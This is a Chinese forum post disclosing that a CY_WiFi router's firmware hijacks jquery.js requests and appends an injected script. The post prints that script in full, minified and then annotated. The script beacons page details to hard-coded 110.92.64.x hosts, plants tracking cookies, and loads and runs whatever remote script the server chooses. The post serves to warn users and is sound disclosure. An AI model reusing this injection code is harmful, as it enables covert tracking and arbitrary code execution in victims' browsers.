

触云爱路由劫持网页投放广告,劫持jquery.js


这个会劫持网页的触云爱路由的情况如下:
固件型号 CY_WiFi_I1
固件版本 1.26.2 (201608221622)

其他版本的不清楚。

具体表现为:遇到网页里面有引用jquery.js的,请求就会被重定向到劫持者的网站上去,在原先的jquery.js内容后面追加一行广告/恶意代码。(具体代码见下面)

比如访问http://www.gojira.net/wp-content/themes/ptent/js/jquery.js
就被重定向到http://110.92.64.70:9001/api/js/?link=/rd/www.gojira.net/wp-content/themes/ptent/js/jquery.js?tid=%2205ca52154c1a%22&rid=%2222c0c0bea425%22

被追加的内容如下(压缩后的原样,格式化版本在后面):
[code];!function(win){var c={log_url:"http://110.92.64.67:6010",ad_url:"http://110.92.64.70:9003",cookie_url:"http://110.92.64.70/get/cookie/",is_log:true,is_decode:true,domain:document.domain.substring(document.domain.indexOf(".")+1,document.domain.length),get_ad:function(){var iframes=document.getElementsByTagName("IFRAME");if(iframes.length<1){return[]}var i=0,domain=document.location.protocol+"//"+document.location.host,property={},adx=[],doc=null;for(i;i<iframes.length;i++){property=[];doc=iframes[i];if(doc.style.visibility!="hidden"&&typeof doc.src!=="undefined"&&doc.src!==""){if(doc.src.indexOf("http")<0||doc.src.indexOf(domain)==0){continue}property.push("s="+encodeURIComponent(doc.src));property.push("i="+(typeof doc.id!=="undefined"?doc.id:""));property.push("w="+doc.offsetWidth);property.push("h="+doc.offsetHeight);property.push("l="+doc.offsetLeft);property.push("tp="+doc.offsetTop);adx.push(property)}}return adx},is_mobile:function(){var e=navigator.userAgent;return !!e.match(/AppleWebKit.*Mobile.*/)||"ontouchstart" in document.documentElement},client:function(){var l=[],b=window.document.body;l.push("url="+encodeURIComponent(document.location.href));l.push("t="+encodeURIComponent(document.title));l.push("sl="+b.scrollWidth);l.push("sh="+b.scrollHeight);return l},image:function(url,callback){var img=new Image;img.src=url;if(typeof callback==="function"){img.onload=function(){callback()}}return img},get_ads:function(){var ads=this.get_ad();if(ads!=""){var ad="",i=0,counts=ads.length,client=this.client().join("&"),val="";for(i;i<counts;i++){ad=ads[i].join("&");this.image(this.log_url+"/api/v1/p/?"+client+"&"+ad)}}},init:function(){var u=document.currentScript.getAttribute("u"),ur=document.currentScript.getAttribute("src"),tid=e.cookie("wf_tid"),rid=e.cookie("wf_rid");if(typeof u!==undefined&&u!==null&&u.indexOf("|")>-1){var 
p=u.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(ur.indexOf("?u=")>-1&&ur.indexOf("|")>-1){ur=ur.substring(ur.indexOf("?u=")+3,ur.length);var p=ur.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(tid==null||rid==null){e.load_js(this.cookie_url,function(d){var dm=document.domain.substring(document.domain.indexOf(".")+1,document.domain.length);if(d.tid!=null&&d.tid!=""){e.cookie("wf_tid",d.tid,365,dm)}if(d.rid!=null&&d.rid!=""){e.cookie("wf_rid",d.rid,365,dm)}e.load(d.tid,d.rid)},true)}else{e.load(tid,rid)}}}if(this.is_log){this.get_ads()}}};var e={is_load:function(){if(self.frameElement&&self.frameElement.tagName=="IFRAME"||window.frames.length!=parent.frames.length||self!=top||document.location.href.indexOf(".gov.cn")>-1){return false}return true},load_js:function(url,callback,is_json,charset){var _doc=document.getElementsByTagName("head")[0],js=document.createElement("script"),cf="jQ"+new Date().getTime()+""+Math.floor(Math.random()*10),n=null;if(typeof callback==="undefined"){callback=function(){}}if(typeof charset==="undefined"){charset="utf-8"}if(typeof is_json!=="undefined"&&is_json==true){eval(cf+"= function(msg) {return "+callback+"(msg);};");url+=(url.indexOf("?")>-1?"&":"?")+"callback="+cf}js.setAttribute("charset",charset);js.setAttribute("type","text/javascript");js.setAttribute("src",url);_doc.appendChild(js);if(typeof js.onload!=="undefined"){js.onload=function(){if(!is_json){callback()}n=js.parentNode;if(n){n.removeChild(js)}}}else{js.onreadystatechange=function(){if(js.readyState=="loaded"||js.readyState=="complete"){js.onreadystatechange=null;if(!is_json){callback&&callback()}n=js.parentNode;if(n){n.removeChild(js)}}}}return false},cookie:function(name,value,day,domain){if(arguments.length==1){var a=document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));if(a!=null){return decodeURIComponent(a[2])}return null}else{if(!arguments[1]){document.cookie=name+"=0; path=/"+((domain)?"; domain="+domain:"")+"; expires=Fri, 02-Jan-1970 
00:00:00 GMT"}else{var e=new Date;if(!day){e.setTime(e.getTime()+24*60*60*1000)}else{e.setTime(e.getTime()+day*24*60*60*1000)}e="; expires="+e.toGMTString();document.cookie=name+"="+value+e+"; path=/"+((domain)?";domain="+domain:"")}}},decode:function(code){var a=[],d=[],k="",m=[],c="";for(var i=0;i<6;i++){k=code.charAt(i*2)+""+code.charAt(i*2+1);a.push(parseInt(k,16))}d[0]=a[0]>>6|a[5]<<2;d[1]=a[1]>>6|a[4]<<2;d[2]=a[2]>>6|a[3]<<2;d[3]=a[3]>>6|a[2]<<2;d[4]=a[4]>>6|a[1]<<2;d[5]=a[5]>>6|a[0]<<2;for(var j=0;j<6;j++){c=(d[j]&255).toString(16);if(c.length==1){c="0"+c}m.push(c)}return m.join("")},load:function(rid,tid){if(rid||tid){rid=decodeURI(rid).replace(/"/g,"");tid=decodeURI(tid).replace(/"/g,"");if(c.is_decode){rid=this.decode(rid);tid=this.decode(tid)}}var url=c.ad_url+"/api/v1/get_ad/?uri="+encodeURIComponent(document.location.href)+"&title="+encodeURIComponent(document.title)+"&rid="+rid+"&tid="+tid+"&plat="+(c.is_mobile()?"m":"pc")+"&ref="+encodeURIComponent(document.referrer);e.load_js(url,function(msg){if(msg!==null&&msg!==""&&msg.url!==""){win._cadx.load_js(msg.url)}},true)}};var cy_adx=function(){if(e.is_load()){c.init()}};win._cadx=e;cy_adx()}(window);[/code]

以下是格式化后的代码:

[code]
// Analyst note: this is the payload the router appends to the hijacked jquery.js.
// It is an immediately-invoked function expression; `win` is the page's window
// (see the trailing `(window)` call). All network endpoints below are hard-coded
// to the two 110.92.64.x hosts named in the post. Comments were added for
// analysis only; the code itself is reproduced byte-for-byte.
function(win) {
// `c`: configuration plus the iframe-reporting ("log") half of the payload.
var c = {
// Receives the page/iframe report built in get_ads (sent as an Image beacon).
log_url: "http://110.92.64.67:6010",
// JSONP endpoint queried for the next script to load (see e.load).
ad_url: "http://110.92.64.70:9003",
// JSONP endpoint that hands out wf_tid / wf_rid when those cookies are absent.
cookie_url: "http://110.92.64.70/get/cookie/",
// When true, init() also reports third-party iframes found on the page.
is_log: true,
// When true, rid/tid are run through e.decode before being sent to ad_url.
is_decode: true,
// document.domain with its first label stripped (e.g. "a.b.c" -> "b.c").
// Computed here but never read; init() recomputes the same expression inline.
domain: document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length),
// Collects src/id/size/position of every visible IFRAME whose src is an http(s)
// URL that does not start with the current page's origin. Returns an array of
// arrays of "k=v" strings (one inner array per iframe); [] when none qualify.
get_ad: function() {
var iframes = document.getElementsByTagName("IFRAME");
if (iframes.length < 1) {
return []
}
var i = 0,
// Current origin, used to skip same-origin iframes.
domain = document.location.protocol + "//" + document.location.host,
// Declared as an object but overwritten with an array on every iteration.
property = {},
adx = [],
doc = null;
for (i; i < iframes.length; i++) {
property = [];
doc = iframes[i];
if (doc.style.visibility != "hidden" && typeof doc.src !== "undefined" && doc.src !== "") {
// Skip non-http srcs and iframes served from this page's own origin.
if (doc.src.indexOf("http") < 0 || doc.src.indexOf(domain) == 0) {
continue
}
property.push("s=" + encodeURIComponent(doc.src));
property.push("i=" + (typeof doc.id !== "undefined" ? doc.id: ""));
property.push("w=" + doc.offsetWidth);
property.push("h=" + doc.offsetHeight);
property.push("l=" + doc.offsetLeft);
property.push("tp=" + doc.offsetTop);
adx.push(property)
}
}
return adx
},
// Heuristic mobile detection: WebKit "Mobile" UA token or a touch-capable document.
is_mobile: function() {
var e = navigator.userAgent;
return !! e.match(/AppleWebKit.*Mobile.*/) || "ontouchstart" in document.documentElement
},
// Page-level fields reported alongside each iframe: full URL, title, body scroll size.
client: function() {
var l = [],
b = window.document.body;
l.push("url=" + encodeURIComponent(document.location.href));
l.push("t=" + encodeURIComponent(document.title));
l.push("sl=" + b.scrollWidth);
l.push("sh=" + b.scrollHeight);
return l
},
// Image beacon: setting src issues a GET to `url` without inserting anything
// into the DOM. `callback`, if a function, runs on load.
image: function(url, callback) {
var img = new Image;
img.src = url;
if (typeof callback === "function") {
img.onload = function() {
callback()
}
}
return img
},
// Sends one beacon per third-party iframe to log_url, carrying the page fields
// from client() plus that iframe's fields. This is the tracking half of the payload.
get_ads: function() {
var ads = this.get_ad();
// Loose comparison: an empty array coerces to "", so this is a non-empty check.
if (ads != "") {
var ad = "",
i = 0,
counts = ads.length,
client = this.client().join("&"),
// `val` is declared but never used.
val = "";
for (i; i < counts; i++) {
ad = ads[i].join("&");
this.image(this.log_url + "/api/v1/p/?" + client + "&" + ad)
}
}
},
// Entry point (called via cy_adx). Determines the tid/rid tracking identifiers,
// in priority order: a `u` attribute on the injecting <script>, a `?u=` in its
// src, existing wf_tid/wf_rid cookies, or a JSONP fetch from cookie_url that also
// sets those cookies for 365 days on the parent domain. Then calls e.load and,
// if is_log, reports iframes.
init: function() {
var u = document.currentScript.getAttribute("u"),
ur = document.currentScript.getAttribute("src"),
tid = e.cookie("wf_tid"),
rid = e.cookie("wf_rid");
// `typeof u !== undefined` compares a string to the value undefined and is always
// true; the effective guards are `u !== null` (attribute present) and the "|" test.
if (typeof u !== undefined && u !== null && u.indexOf("|") > -1) {
var p = u.split("|");
tid = p[0];
rid = p[1];
// NOTE(review): e.load is declared as load(rid, tid); every caller here passes
// (tid, rid), so the two identifiers are swapped on the wire.
e.load(tid, rid)
} else {
// `ur` would be null if the script had no src; ur.indexOf would then throw.
if (ur.indexOf("?u=") > -1 && ur.indexOf("|") > -1) {
ur = ur.substring(ur.indexOf("?u=") + 3, ur.length);
var p = ur.split("|");
tid = p[0];
rid = p[1];
e.load(tid, rid)
} else {
if (tid == null || rid == null) {
// JSONP: the server's response object `d` supplies tid/rid.
e.load_js(this.cookie_url,
function(d) {
// Parent domain so the cookie is shared across subdomains.
var dm = document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length);
if (d.tid != null && d.tid != "") {
e.cookie("wf_tid", d.tid, 365, dm)
}
if (d.rid != null && d.rid != "") {
e.cookie("wf_rid", d.rid, 365, dm)
}
e.load(d.tid, d.rid)
},
true)
} else {
e.load(tid, rid)
}
}
}
if (this.is_log) {
this.get_ads()
}
}
};
// `e`: script/JSONP loader, cookie helper, identifier decoder. Also exposed as
// window._cadx (see the end of the IIFE).
var e = {
// Gate: returns false (payload stays idle) when running inside an IFRAME, when the
// frame count differs from the parent's, when not the top window, or when the
// page URL contains ".gov.cn" -- an explicit exclusion of government sites.
is_load: function() {
if (self.frameElement && self.frameElement.tagName == "IFRAME" || window.frames.length != parent.frames.length || self != top || document.location.href.indexOf(".gov.cn") > -1) {
return false
}
return true
},
// Injects a <script src=url> into <head> and removes it once loaded. With is_json
// true it behaves as a JSONP loader: a global callback named "jQ"+timestamp+digit
// is created via eval and its name appended as ?callback=. The "jQ" prefix makes
// the global look jQuery-related. Always returns false.
load_js: function(url, callback, is_json, charset) {
var _doc = document.getElementsByTagName("head")[0],
js = document.createElement("script"),
cf = "jQ" + new Date().getTime() + "" + Math.floor(Math.random() * 10),
n = null;
if (typeof callback === "undefined") {
callback = function() {}
}
if (typeof charset === "undefined") {
charset = "utf-8"
}
if (typeof is_json !== "undefined" && is_json == true) {
// `callback` is coerced to its source text inside the eval string; the
// assignment targets an undeclared name, so (no strict mode) it becomes a global.
eval(cf + "= function(msg) {return " + callback + "(msg);};");
// Throws if `url` is undefined (see the msg.url check in e.load).
url += (url.indexOf("?") > -1 ? "&": "?") + "callback=" + cf
}
js.setAttribute("charset", charset);
js.setAttribute("type", "text/javascript");
js.setAttribute("src", url);
_doc.appendChild(js);
if (typeof js.onload !== "undefined") {
js.onload = function() {
// For JSONP the server-invoked global callback does the work, not this one.
if (!is_json) {
callback()
}
// Remove the script element to leave no trace in the DOM.
n = js.parentNode;
if (n) {
n.removeChild(js)
}
}
} else {
// Legacy (old IE) fallback using readyState.
js.onreadystatechange = function() {
if (js.readyState == "loaded" || js.readyState == "complete") {
js.onreadystatechange = null;
if (!is_json) {
callback && callback()
}
n = js.parentNode;
if (n) {
n.removeChild(js)
}
}
}
}
return false
},
// Cookie helper. One argument: read `name` from document.cookie (null if absent).
// Falsy `value`: expire the cookie. Otherwise set it for `day` days (1 if omitted),
// path=/, optionally scoped to `domain`. `name` is interpolated into a RegExp
// unescaped; the only names used here are the fixed wf_tid / wf_rid.
cookie: function(name, value, day, domain) {
if (arguments.length == 1) {
var a = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
if (a != null) {
return decodeURIComponent(a[2])
}
return null
} else {
if (!arguments[1]) {
document.cookie = name + "=0; path=/" + ((domain) ? "; domain=" + domain: "") + "; expires=Fri, 02-Jan-1970 00:00:00 GMT"
} else {
// Local `e` (a Date, later a string) shadows the outer loader object here.
var e = new Date;
if (!day) {
e.setTime(e.getTime() + 24 * 60 * 60 * 1000)
} else {
e.setTime(e.getTime() + day * 24 * 60 * 60 * 1000)
}
e = "; expires=" + e.toGMTString();
document.cookie = name + "=" + value + e + "; path=/" + ((domain) ? ";domain=" + domain: "")
}
}
},
// Undoes a light obfuscation of a 12-hex-character identifier: parse 6 bytes,
// then output byte i = (a[i] >> 6 | a[5-i] << 2) & 255 -- a fixed bit shuffle,
// not encryption. Returns 12 lowercase hex characters.
decode: function(code) {
var a = [],
d = [],
k = "",
m = [],
c = "";
for (var i = 0; i < 6; i++) {
k = code.charAt(i * 2) + "" + code.charAt(i * 2 + 1);
a.push(parseInt(k, 16))
}
d[0] = a[0] >> 6 | a[5] << 2;
d[1] = a[1] >> 6 | a[4] << 2;
d[2] = a[2] >> 6 | a[3] << 2;
d[3] = a[3] >> 6 | a[2] << 2;
d[4] = a[4] >> 6 | a[1] << 2;
d[5] = a[5] >> 6 | a[0] << 2;
for (var j = 0; j < 6; j++) {
// Mask to one byte and zero-pad to two hex digits.
c = (d[j] & 255).toString(16);
if (c.length == 1) {
c = "0" + c
}
m.push(c)
}
return m.join("")
},
// Asks ad_url (JSONP) what to run next, sending the page URL, title, both
// identifiers, a mobile/pc flag and the referrer. If the response carries a
// `url`, that script is loaded and executed in the page -- the server picks
// arbitrary code to run. Parameter order here is (rid, tid); init passes (tid, rid).
load: function(rid, tid) {
if (rid || tid) {
// Strip URL encoding and the literal double quotes seen in the injected ?tid="..." values.
rid = decodeURI(rid).replace(/"/g, "");
tid = decodeURI(tid).replace(/"/g, "");
if (c.is_decode) {
rid = this.decode(rid);
tid = this.decode(tid)
}
}
var url = c.ad_url + "/api/v1/get_ad/?uri=" + encodeURIComponent(document.location.href) + "&title=" + encodeURIComponent(document.title) + "&rid=" + rid + "&tid=" + tid + "&plat=" + (c.is_mobile() ? "m": "pc") + "&ref=" + encodeURIComponent(document.referrer);
e.load_js(url,
function(msg) {
// Guards against null/"" only; an object without `url` passes and load_js
// would then throw on url.indexOf.
if (msg !== null && msg !== "" && msg.url !== "") {
win._cadx.load_js(msg.url)
}
},
true)
}
};
// Top-level entry: run init only when the is_load gate allows it.
var cy_adx = function() {
if (e.is_load()) {
c.init()
}
};
// Exposes the loader globally as window._cadx (used by load's callback above).
win._cadx = e;
cy_adx()
} (window);
[/code]

看到这两个香港服务器ip得小心了。
110.92.64.67
110.92.64.70

我也仅仅是初步发现了这一点问题。如果继续挖掘,偷取敏感信息/密码都是可能的,例如cookie这些是简简单单就能到手的,毕竟上网的数据都经过该路由器。

没想到触云爱路由会如此无耻,不要脸到如此地步也没谁了。

解决办法是刷其他路由器的固件,目前我刷的是如意云的固件,网页被劫持情况消失。

